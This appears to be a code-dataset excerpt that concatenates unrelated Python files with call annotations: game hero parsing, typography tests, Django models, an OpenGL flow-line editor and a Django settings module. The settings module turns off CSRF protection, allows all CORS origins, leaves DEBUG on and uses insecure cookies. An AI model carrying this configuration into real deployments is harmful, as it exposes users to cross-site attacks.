contract_entry[tuple_index][1] hero_state['mpFullAt'] = contract_entry[tuple_index][2] hero_state['level'] = contract_entry[tuple_index][3] hero_state['xp'] = contract_entry[tuple_index][4] hero_state['currentQuest'] = contract_entry[tuple_index][5] hero_state['sp'] = contract_entry[tuple_index][6] hero_state['status'] = contract_entry[tuple_index][7] hero['state'] = hero_state tuple_index = tuple_index + 1 # HeroStats hero_stats = {} hero_stats['strength'] = contract_entry[tuple_index][0] hero_stats['intelligence'] = contract_entry[tuple_index][1] hero_stats['wisdom'] = contract_entry[tuple_index][2] hero_stats['luck'] = contract_entry[tuple_index][3] hero_stats['agility'] = contract_entry[tuple_index][4] hero_stats['vitality'] = contract_entry[tuple_index][5] hero_stats['endurance'] = contract_entry[tuple_index][6] hero_stats['dexterity'] = contract_entry[tuple_index][7] hero_stats['hp'] = contract_entry[tuple_index][8] hero_stats['mp'] = contract_entry[tuple_index][9] hero_stats['stamina'] = contract_entry[tuple_index][10] hero['stats'] = hero_stats tuple_index = tuple_index + 1 # primary HeroStatGrowth hero_primary_stat_growth = {} hero_primary_stat_growth['strength'] = contract_entry[tuple_index][0] hero_primary_stat_growth['intelligence'] = contract_entry[tuple_index][1] hero_primary_stat_growth['wisdom'] = contract_entry[tuple_index][2] hero_primary_stat_growth['luck'] = contract_entry[tuple_index][3] hero_primary_stat_growth['agility'] = contract_entry[tuple_index][4] hero_primary_stat_growth['vitality'] = contract_entry[tuple_index][5] hero_primary_stat_growth['endurance'] = contract_entry[tuple_index][6] hero_primary_stat_growth['dexterity'] = contract_entry[tuple_index][7] hero_primary_stat_growth['hpSm'] = contract_entry[tuple_index][8] hero_primary_stat_growth['hpRg'] = contract_entry[tuple_index][9] hero_primary_stat_growth['hpLg'] = contract_entry[tuple_index][10] hero_primary_stat_growth['mpSm'] = contract_entry[tuple_index][11] hero_primary_stat_growth['mpRg'] = contract_entry[tuple_index][12] hero_primary_stat_growth['mpLg'] = contract_entry[tuple_index][13] hero['primaryStatGrowth'] = hero_primary_stat_growth tuple_index = tuple_index + 1 # secondary HeroStatGrowth hero_secondary_stat_growth = {} hero_secondary_stat_growth['strength'] = contract_entry[tuple_index][0] hero_secondary_stat_growth['intelligence'] = contract_entry[tuple_index][1] hero_secondary_stat_growth['wisdom'] = contract_entry[tuple_index][2] hero_secondary_stat_growth['luck'] = contract_entry[tuple_index][3] hero_secondary_stat_growth['agility'] = contract_entry[tuple_index][4] hero_secondary_stat_growth['vitality'] = contract_entry[tuple_index][5] hero_secondary_stat_growth['endurance'] = contract_entry[tuple_index][6] hero_secondary_stat_growth['dexterity'] = contract_entry[tuple_index][7] hero_secondary_stat_growth['hpSm'] = contract_entry[tuple_index][8] hero_secondary_stat_growth['hpRg'] = contract_entry[tuple_index][9] hero_secondary_stat_growth['hpLg'] = contract_entry[tuple_index][10] hero_secondary_stat_growth['mpSm'] = contract_entry[tuple_index][11] hero_secondary_stat_growth['mpRg'] = contract_entry[tuple_index][12] hero_secondary_stat_growth['mpLg'] = contract_entry[tuple_index][13] hero['secondaryStatGrowth'] = hero_secondary_stat_growth tuple_index = tuple_index + 1 # HeroProfessions hero_professions = {} hero_professions['mining'] = contract_entry[tuple_index][0] hero_professions['gardening'] = contract_entry[tuple_index][1] hero_professions['foraging'] = contract_entry[tuple_index][2] hero_professions['fishing'] = contract_entry[tuple_index][3] hero['professions'] = hero_professions return hero def human_readable_hero(raw_hero, hero_male_first_names=None, hero_female_first_names=None, hero_last_names=None): readable_hero = copy.deepcopy(raw_hero) readable_hero['info']['rarity'] = hero_utils.parse_rarity(readable_hero['info']['rarity']) readable_hero['info']['class'] = hero_utils.parse_class(readable_hero['info']['class']) readable_hero['info']['subClass'] = hero_utils.parse_class(readable_hero['info']['subClass']) # visualGenes readable_hero['info']['visualGenes'] = hero_utils.parse_visual_genes(readable_hero['info']['visualGenes']) # statsGenes readable_hero['info']['statGenes'] = hero_utils.parse_stat_genes(readable_hero['info']['statGenes']) # names if readable_hero['info']['visualGenes']['gender'] == 'male': if hero_male_first_names is not None: readable_hero['info']['firstName'] = hero_male_first_names[readable_hero['info']['firstName']] else: if hero_female_first_names is not None: readable_hero['info']['firstName'] = hero_female_first_names[readable_hero['info']['firstName']] if hero_last_names is not None: readable_hero['info']['lastName'] = hero_last_names[readable_hero['info']['lastName']] return readable_hero
[((71, 23, 71, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(71, 46, 71, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((97, 23, 97, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(97, 46, 97, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((106, 23, 106, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(106, 46, 106, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((115, 23, 115, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(115, 46, 115, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((124, 23, 124, 63), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(124, 46, 124, 62): 'CONTRACT_ADDRESS'}, {}), '(CONTRACT_ADDRESS)', False, 'from web3 import Web3\n'), ((246, 20, 246, 43), 'copy.deepcopy', 'copy.deepcopy', ({(246, 34, 246, 42): 'raw_hero'}, {}), '(raw_hero)', False, 'import copy\n'), ((67, 14, 67, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(67, 32, 67, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((95, 14, 95, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(95, 32, 95, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((104, 14, 104, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(104, 32, 104, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((113, 14, 113, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(113, 32, 113, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((122, 14, 122, 44), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(122, 32, 122, 43): 'rpc_address'}, {}), '(rpc_address)', False, 'from web3 import Web3\n'), ((109, 44, 109, 80), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(109, 67, 109, 79): 'user_address'}, {}), '(user_address)', False, 'from web3 import Web3\n'), ((118, 47, 118, 76), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(118, 70, 118, 75): 'owner'}, {}), '(owner)', False, 'from web3 import Web3\n'), ((118, 78, 118, 110), 'web3.Web3.toChecksumAddress', 'Web3.toChecksumAddress', ({(118, 101, 118, 109): 'operator'}, {}), '(operator)', False, 'from web3 import Web3\n')]
honzajavorek/tipi
tests/test_langs_fr.py
cbe51192725608b6fba1244a48610ae231b13e08
# -*- coding: utf-8 -*- from __future__ import unicode_literals from tipi import tipi as _tipi tipi = lambda s: _tipi(s, lang='fr') def test_double_quotes(): assert tipi('''"brutal" "quote's"''') == ( '''«brutal» «quote's»''' ) def test_single_quotes(): assert tipi("""'brutal' 'quote's'""") == ( """‹brutal› ‹quote's›""" )
[((8, 17, 8, 36), 'tipi.tipi', '_tipi', (), '', True, 'from tipi import tipi as _tipi\n')]
brethauer/mirage
vendor/models.py
396f61206bf76f997c0535277af918058aa1b827
from django.db import models VEHICLE_CHOICES = ( ('OASISSB', 'OASIS Small Business'), ('OASIS', 'OASIS Unrestricted') ) STATUS_CHOICES = ( ('P', 'In Progress'), ('C', 'Completed'), ('F', 'Cancelled') ) class Vendor(models.Model): name = models.CharField(max_length=128) duns = models.CharField(max_length=9, unique=True) duns_4 = models.CharField(max_length=13, unique=True) cage = models.CharField(max_length=15, null=True) sam_address = models.CharField(null=True, max_length=128) sam_citystate = models.CharField(null=True, max_length=128) cm_name = models.CharField(null=True, max_length=128) cm_email = models.CharField(null=True, max_length=128) cm_phone = models.CharField(null=True, max_length=128) pm_name = models.CharField(null=True, max_length=128) pm_email = models.CharField(null=True, max_length=128) pm_phone = models.CharField(null=True, max_length=128) pools = models.ManyToManyField('Pool', through='PoolPIID') setasides = models.ManyToManyField('SetAside', null=True, blank=True) sam_status = models.CharField(null=True, max_length=128) sam_activation_date = models.DateTimeField(null=True) sam_expiration_date = models.DateTimeField(null=True) sam_exclusion = models.NullBooleanField(null=True) sam_url = models.URLField(null=True) annual_revenue = models.BigIntegerField(null=True) number_of_employees = models.IntegerField(null=True) def __str__(self): return self.name class Pool(models.Model): id = models.CharField(primary_key=True, max_length=128) name = models.CharField(max_length=128, default='Pool') number = models.CharField(max_length=128) vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=7) naics = models.ManyToManyField('Naics') threshold = models.CharField(null=True, max_length=128) def __str__(self): return "Pool {0} - {1}".format(self.number, self.get_vehicle_display()) class PoolPIID(models.Model): vendor = models.ForeignKey('Vendor') pool = models.ForeignKey('Pool') piid = models.CharField(max_length=128) def __str__(self): return "{0} - {1} - {2}".format(self.vendor.name, self.pool.id, self.piid) class SetAside(models.Model): code = models.CharField(unique=True, max_length=128) short_name = models.CharField(max_length=128) abbreviation = models.CharField(max_length=10, null=True) far_order = models.IntegerField(null=True) def __str__(self): return self.short_name class Naics(models.Model): code = models.CharField(max_length=128) description = models.TextField() short_code = models.CharField(unique=True, max_length=25) def __str__(self): return "{0} - {1}".format(self.code, self.description) class SamLoad(models.Model): sam_load = models.DateField()
[((17, 11, 17, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((18, 11, 18, 54), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((19, 13, 19, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((20, 11, 20, 53), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((21, 18, 21, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((22, 20, 22, 63), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((23, 14, 23, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 15, 24, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((25, 15, 25, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((26, 14, 26, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((27, 15, 27, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((28, 15, 28, 58), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((29, 12, 29, 62), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((30, 16, 30, 73), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (), '', False, 'from django.db import models\n'), ((31, 17, 31, 60), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((32, 26, 32, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((33, 26, 33, 57), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((34, 20, 34, 54), 'django.db.models.NullBooleanField', 'models.NullBooleanField', (), '', False, 'from django.db import models\n'), ((35, 14, 35, 40), 'django.db.models.URLField', 'models.URLField', (), '', False, 'from django.db import models\n'), ((36, 21, 36, 54), 'django.db.models.BigIntegerField', 'models.BigIntegerField', (), '', False, 'from django.db import models\n'), ((37, 26, 37, 56), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((45, 9, 45, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((46, 11, 46, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((47, 13, 47, 45), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((48, 14, 48, 69), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((49, 12, 49, 43), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ({(49, 35, 49, 42): '"""Naics"""'}, {}), "('Naics')", False, 'from django.db import models\n'), ((50, 16, 50, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((57, 13, 57, 40), 'django.db.models.ForeignKey', 'models.ForeignKey', ({(57, 31, 57, 39): '"""Vendor"""'}, {}), "('Vendor')", False, 'from django.db import models\n'), ((58, 11, 58, 36), 'django.db.models.ForeignKey', 'models.ForeignKey', ({(58, 29, 58, 35): '"""Pool"""'}, {}), "('Pool')", False, 'from django.db import models\n'), ((59, 11, 59, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((66, 11, 66, 56), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((67, 17, 67, 49), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((68, 19, 68, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((69, 16, 69, 46), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import models\n'), ((76, 11, 76, 43), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((77, 18, 77, 36), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import models\n'), ((78, 17, 78, 61), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((84, 15, 84, 33), 'django.db.models.DateField', 'models.DateField', ({}, {}), '()', False, 'from django.db import models\n')]
L-McCormack/two-qubit-simulator
two_qubit_simulator/circuits.py
d7115f0630c9931724aa660dba4b89a50db4e2e0
""" Contains the QuantumCircuit class boom. """ class QuantumCircuit(object): # pylint: disable=useless-object-inheritance """ Implements a quantum circuit. - - - WRITE DOCUMENTATION HERE - - - """ def __init__(self): """ Initialise a QuantumCircuit object """ pass def add_gate(self, gate): """ Add a gate to the circuit """ pass def run_circuit(self, register): """ Run the circuit on a given quantum register """ pass def __call__(self, register): """ Run the circuit on a given quantum register """ pass
[]
usgs/water-datapreptools
examples/bathymetricGradient.py
49c852a0c189e142a351331ba6e0d1ef9e7a408b
import sys sys.path.append("..") # change environment to see tools from make_hydrodem import bathymetricGradient workspace = r"" # path to geodatabase to use as a workspace snapGrid = r"" # path to snapping grid hucPoly = r"" # path to local folder polygon hydrographyArea = r"" # path to NHD area feature class hydrographyFlowline = r"" # path to NHD flowline feature class hydrographyWaterbody = r"" # path to NHD water body feature class cellsize = '' # cell size bathymetricGradient(workspace, snapGrid, hucPoly, hydrographyArea, hydrographyFlowline, hydrographyWaterbody,cellsize)
[((2, 0, 2, 21), 'sys.path.append', 'sys.path.append', ({(2, 16, 2, 20): '""".."""'}, {}), "('..')", False, 'import sys\n'), ((13, 0, 14, 52), 'make_hydrodem.bathymetricGradient', 'bathymetricGradient', ({(13, 20, 13, 29): 'workspace', (13, 31, 13, 39): 'snapGrid', (13, 41, 13, 48): 'hucPoly', (13, 50, 13, 65): 'hydrographyArea', (14, 1, 14, 20): 'hydrographyFlowline', (14, 22, 14, 42): 'hydrographyWaterbody', (14, 43, 14, 51): 'cellsize'}, {}), '(workspace, snapGrid, hucPoly, hydrographyArea,\n hydrographyFlowline, hydrographyWaterbody, cellsize)', False, 'from make_hydrodem import bathymetricGradient\n')]
hxb1997/Menge
out/flowContext.py
7a09a6236d8eef23e3d15d08873d5918d064761b
# This is the OpenGL context for drawing flow calculation lines from Context import * from primitives import Vector2, Segment from OpenGL.GL import * from copy import deepcopy class GLFlowSegment( Segment ): '''The OpenGL representation of a flow line. Basically a segment with a direciton indicator. The direction indicator shows which way flow is expected to cross the line. The flow direction is to the RIGHT of the segment. The forward direction is the direction from p1 to p2.''' def __init__( self, p1, p2 ): '''Constructor. @param p1 An instance of Vector2. The start point of the segment. @param p2 An instance of Vector2. The end point of the segment. ''' Segment.__init__( self, p1, p2 ) def __str__( self ): return "GLFlowSegment (%s, %s)" % ( self.p1, self.p2 ) def __repr__( self ): return str( self ) def drawGL( self, color=(0.1, 1.0, 0.1) ): '''Draw the flow segment into a GL context. @param A 3-tuple of floats. The color of the line. All values should lie in the range [0, 1], to be interpreted as r, g, b color values. ''' glPushAttrib( GL_COLOR_BUFFER_BIT ) glBegin( GL_LINES ) glColor3fv( color ) glVertex2f( self.p1.x, self.p1.y ) glVertex2f( self.p2.x, self.p2.y ) mp = self.midPoint() l = self.magnitude() n = self.normal() * (0.25 * l ) end = mp + n glVertex2f( mp.x, mp.y ) glVertex2f( end.x, end.y ) glEnd() glPopAttrib() class FlowLineContext( BaseContext ): '''Context for drawing, creating and editing lines''' MIN_LINE_LENGTH = 2 # the minimum drag required to draw a line # edit state - used for knowing what to do with the active line and cancellation NO_EDIT = 0 EDIT = 1 ADD = 2 def __init__( self, cancelCB=None, editCB=None ): '''Constructor. @param cancelCB A callable. An optional callback object for when flow line drawing is canceled. @param editCB A callable. An optional callback object for when a flow line values are edited. ''' BaseContext.__init__( self ) self.lines = [] self.names = [] self.activeID = -1 # the line currently affected by modifications self.editState = self.NO_EDIT self.cancelCB = cancelCB self.editCB = editCB self.activeLine = None self.canDraw = False self.dragging = False self.downPost = None def copy( self, context ): '''Copy the state of the given FlowLineContext into this''' assert( isinstance( context, FlowLineContext ) ) self.clear() self.names = [ a for a in context.names ] self.lines = deepcopy( context.lines ) def clear( self ): '''Clears out all of the lines''' self.lines = [] self.names = [] self.activeID = -1 self.editState = self.NO_EDIT self.activeLine = None self.canDraw = False self.dragging = False self.downPost = None def lineCount( self ): return len( self.lines ) def getName( self, id ): '''Returns the name associated with the line index, id. @param id An integer. The index into the stored set of lines. @return A string. The stored name. ''' return self.names[ id ] def getLine( self, id ): '''Returns the name associated with the line index, id. @param id An integer. The index into the stored set of lines. @return An instance of a FlowLine. ''' return self.lines[ id ] def addLine( self ): '''Causes the context to go into new line mode. Returning the new name.''' self.canDraw = True self.editState = self.ADD self.activeID = -1 self.names.append( 'Line %d' % len( self.names ) ) self.lines.append( GLFlowSegment( Vector2(0, 0), Vector2(0, 0) ) ) self.activeLine = self.lines[-1] return self.names[-1] def editLine( self, idx ): '''Edits the indicated line''' if ( self.editState == self.ADD): return if ( idx < 0 ): self.editState = self.NO_EDIT self.canDraw = False self.activeID = -1 else: self.editState = self.EDIT self.canDraw = True self.activeID = idx def setLineName( self, idx, name ): '''Sets the name for the line with the given index''' self.names[ idx ] = name def deleteLine( self, idx ): '''Removes a line from the set''' assert( idx >= 0 and idx < len( self.lines ) ) self.lines.pop( idx ) self.names.pop( idx ) self.activeID = -1 def flipLine( self, idx ): '''Flips the direction of the line in the set''' assert( idx >= 0 and idx < len( self.lines ) ) self.lines[ idx ].flip() def setActive( self, idx ): '''Sets the active line''' self.activeID = idx def stopEdit( self ): '''Stops the ability to edit''' self.editState = self.NO_EDIT self.canDraw = False def getLineCount( self ): """Returns the number of defined lines""" return len( self.lines ) def setMultiLines( self, names, lines ): '''Sets the lines in the context with the given names and lines. It is asserted that len( names ) == len( lines ). @param names A list of strings. One name per line. @param lines A list of Segment instaces. One line per name. ''' self.lines = map( lambda x: GLFlowSegment( x.p1, x.p2 ), lines ) self.names = names self.activeID = -1 self.editState = self.NO_EDIT def handleMouse ( self, evt, view ): """Detects click, drag, release and creates a line""" result = ContextResult() try: event = self.canonicalEvent( evt ) except ValueError as e: return result if ( not self.canDraw ): return result if ( event.noModifiers() ): btn = event.button eX = event.x eY = event.y if ( event.type == MouseEvent.DOWN ): #QtCore.QEvent.MouseButtonPress ): if ( btn == MouseEvent.LEFT ): self.downPos = Vector2( eX, eY ) x, y = view.screenToWorld( ( eX, eY ) ) p1 = Vector2( x, y ) self.activeLine = GLFlowSegment( p1, p1 ) result.set( True, True, False ) self.dragging = True self.notifyEdit( self.activeLine ) elif ( btn == MouseEvent.RIGHT and self.dragging ): # cancel the edit if ( self.editState == self.ADD ): self.editState = self.NO_EDIT self.lines.pop(-1) self.names.pop(-1) if ( not self.cancelCB is None ): self.cancelCB() self.notifyEdit( None ) canceled = self.activeLine != None self.activeLine = None self.dragging = False result.set( canceled, canceled, False ) elif ( event.type == MouseEvent.UP ): if ( btn == MouseEvent.LEFT and self.dragging ): endPos = Vector2( eX, eY ) if ( (endPos - self.downPos).magnitude() >= self.MIN_LINE_LENGTH ): if ( self.editState == self.ADD ): self.activeID = len( self.lines ) - 1 self.lines[self.activeID] = self.activeLine self.editState = self.EDIT self.notifyEdit( self.activeLine ) elif ( self.editState == self.EDIT ): assert( self.activeID > -1 ) self.lines[ self.activeID ] = self.activeLine self.notifyEdit( self.activeLine ) self.activeLine = None self.activeLine = None self.dragging = False result.set( True, True, False ) elif ( event.type == MouseEvent.MOVE ): if ( self.dragging ): x, y = view.screenToWorld( ( eX, eY ) ) p2 = Vector2( x, y ) self.activeLine.p2 = p2 result.set( True, True, False ) self.notifyEdit( self.activeLine ) return result def notifyEdit( self, line ): '''Notifies call back of a line that has changed''' if ( not self.editCB is None ): self.editCB( line ) def drawGL( self ): '''Basic lines are drawn in default (green), the active line is drawn in yellow, and when it is being edited, the original disappears and the new line is drawn in cyan.''' if ( self.activeLine ): self.activeLine.drawGL( ( 0.1, 1.0, 1.0 ) ) elif ( self.activeID > -1 and self.editState != self.ADD ): self.lines[ self.activeID ].drawGL( ( 1.0, 1.0, 0.1 ) ) for i, line in enumerate( self.lines ): if ( i == self.activeID ): continue line.drawGL()
[((20, 8, 20, 40), 'primitives.Segment.__init__', 'Segment.__init__', ({(20, 26, 20, 30): 'self', (20, 32, 20, 34): 'p1', (20, 36, 20, 38): 'p2'}, {}), '(self, p1, p2)', False, 'from primitives import Vector2, Segment\n'), ((84, 21, 84, 46), 'copy.deepcopy', 'deepcopy', ({(84, 31, 84, 44): 'context.lines'}, {}), '(context.lines)', False, 'from copy import deepcopy\n'), ((122, 42, 122, 55), 'primitives.Vector2', 'Vector2', ({(122, 50, 122, 51): '(0)', (122, 53, 122, 54): '(0)'}, {}), '(0, 0)', False, 'from primitives import Vector2, Segment\n'), ((122, 57, 122, 70), 'primitives.Vector2', 'Vector2', ({(122, 65, 122, 66): '(0)', (122, 68, 122, 69): '(0)'}, {}), '(0, 0)', False, 'from primitives import Vector2, Segment\n'), ((195, 35, 195, 52), 'primitives.Vector2', 'Vector2', ({(195, 44, 195, 46): 'eX', (195, 48, 195, 50): 'eY'}, {}), '(eX, eY)', False, 'from primitives import Vector2, Segment\n'), ((197, 25, 197, 40), 'primitives.Vector2', 'Vector2', ({(197, 34, 197, 35): 'x', (197, 37, 197, 38): 'y'}, {}), '(x, y)', False, 'from primitives import Vector2, Segment\n'), ((217, 29, 217, 46), 'primitives.Vector2', 'Vector2', ({(217, 38, 217, 40): 'eX', (217, 42, 217, 44): 'eY'}, {}), '(eX, eY)', False, 'from primitives import Vector2, Segment\n'), ((235, 25, 235, 40), 'primitives.Vector2', 'Vector2', ({(235, 34, 235, 35): 'x', (235, 37, 235, 38): 'y'}, {}), '(x, y)', False, 'from primitives import Vector2, Segment\n')]
Paola351/instascrape
instascrape/collectors/__init__.py
b4a50c9140fa9054187738f6d1564cecc32cbaab
from .interval_collectors import *
[]
ghoslation/algorithm
Codes/gracekoo/test.py
5708bf89e59a80cd0f50f2e6138f069b4f9bc96e
# -*- coding: utf-8 -*- # @Time: 2020/11/8 23:47 # @Author: GraceKoo # @File: test.py # @Desc: from threading import Thread import time def print_numbers(): time.sleep(0.2) print("子线程结束") if __name__ == "__main__": t1 = Thread(target=print_numbers) t1.setDaemon(True) t1.start() # print("主线程结束")
[((11, 4, 11, 19), 'time.sleep', 'time.sleep', ({(11, 15, 11, 18): '(0.2)'}, {}), '(0.2)', False, 'import time\n'), ((16, 9, 16, 37), 'threading.Thread', 'Thread', (), '', False, 'from threading import Thread\n')]
gregory-chekler/api
src/_main_/settings.py
11ecbea945e7eb6fa677a0c0bb32bda51ba15f28
""" Django settings for massenergize_portal_backend project. Generated by 'django-admin startproject' using Django 2.1.4. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os import firebase_admin from firebase_admin import credentials from .utils.utils import load_json # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # ******** LOAD CONFIG DATA ***********# IS_PROD = False path_to_config = '/_main_/config/massenergizeProdConfig.json' if IS_PROD else '/_main_/config/massenergizeProjectConfig.json' CONFIG_DATA = load_json(BASE_DIR + path_to_config) os.environ.update(CONFIG_DATA) # ******** END LOAD CONFIG DATA ***********# SECRET_KEY = CONFIG_DATA["SECRET_KEY"] # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [ 'localhost', '127.0.0.1', 'api.massenergize.org', 'apis.massenergize.org', 'api.massenergize.com', 'apis.massenergize.com', 'api-prod.massenergize.org', 'api.prod.massenergize.org', 'api-dev.massenergize.org', 'api.dev.massenergize.org', 'massenergize-api.wpdvzstek2.us-east-2.elasticbeanstalk.com' ] INSTALLED_APPS = [ 'authentication', 'carbon_calculator', 'database', 'api', 'website', 'corsheaders', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'corsheaders.middleware.CorsMiddleware', 'django.middleware.common.CommonMiddleware', # 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', #custom middlewares 'authentication.middleware.MassenergizeJWTAuthMiddleware' ] #-------- FILE STORAGE CONFIGURATION ---------------------# DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage' STATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage' #-------- FILE STORAGE CONFIGURATION ---------------------# #-------- AWS CONFIGURATION ---------------------# AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') AWS_STORAGE_BUCKET_NAME = os.environ.get('AWS_STORAGE_BUCKET_NAME') AWS_S3_SIGNATURE_VERSION = os.environ.get('AWS_S3_SIGNATURE_VERSION') AWS_S3_REGION_NAME = os.environ.get('AWS_S3_REGION_NAME') AWS_DEFAULT_ACL = None #--------END AWS CONFIGURATION ---------------------# CORS_ORIGIN_ALLOW_ALL = True CORS_ALLOW_CREDENTIALS = True DATA_UPLOAD_MAX_MEMORY_SIZE = 2621440*3 ROOT_URLCONF = '_main_.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = '_main_.wsgi.application' CSRF_COOKIE_SECURE = False SESSION_COOKIE_SECURE = False # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'remote-default': { 'ENGINE' : os.environ.get('DATABASE_ENGINE'), 'NAME' : os.environ.get('DATABASE_NAME'), 'USER' : os.environ.get('DATABASE_USER'), 'PASSWORD' : os.environ.get('DATABASE_PASSWORD'), 'HOST' : os.environ.get('DATABASE_HOST'), 'PORT' : os.environ.get('DATABASE_PORT') }, 'default': { 'ENGINE' : os.environ.get('DATABASE_ENGINE'), 'NAME' : 'gchekler21', 'USER' : '', 'PASSWORD' : '', 'HOST' : 'localhost', 'PORT' : '5555' }, } firebase_service_account_path = '/_main_/config/massenergizeProdFirebaseServiceAccount.json' if IS_PROD else '/_main_/config/massenergizeFirebaseServiceAccount.json' FIREBASE_CREDENTIALS = credentials.Certificate(BASE_DIR + firebase_service_account_path) firebase_admin.initialize_app(FIREBASE_CREDENTIALS) # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend' EMAIL_USE_TLS = True EMAIL_HOST = 'smtp.gmail.com' EMAIL_PORT = 587 EMAIL_HOST_USER = os.environ.get('EMAIL') DEFAULT_FROM_EMAIL = os.environ.get('EMAIL') EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_PASSWORD') # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' MEDIA_URL = '/media/' # Simplified static file serving. STATICFILES_LOCATION = 'static' 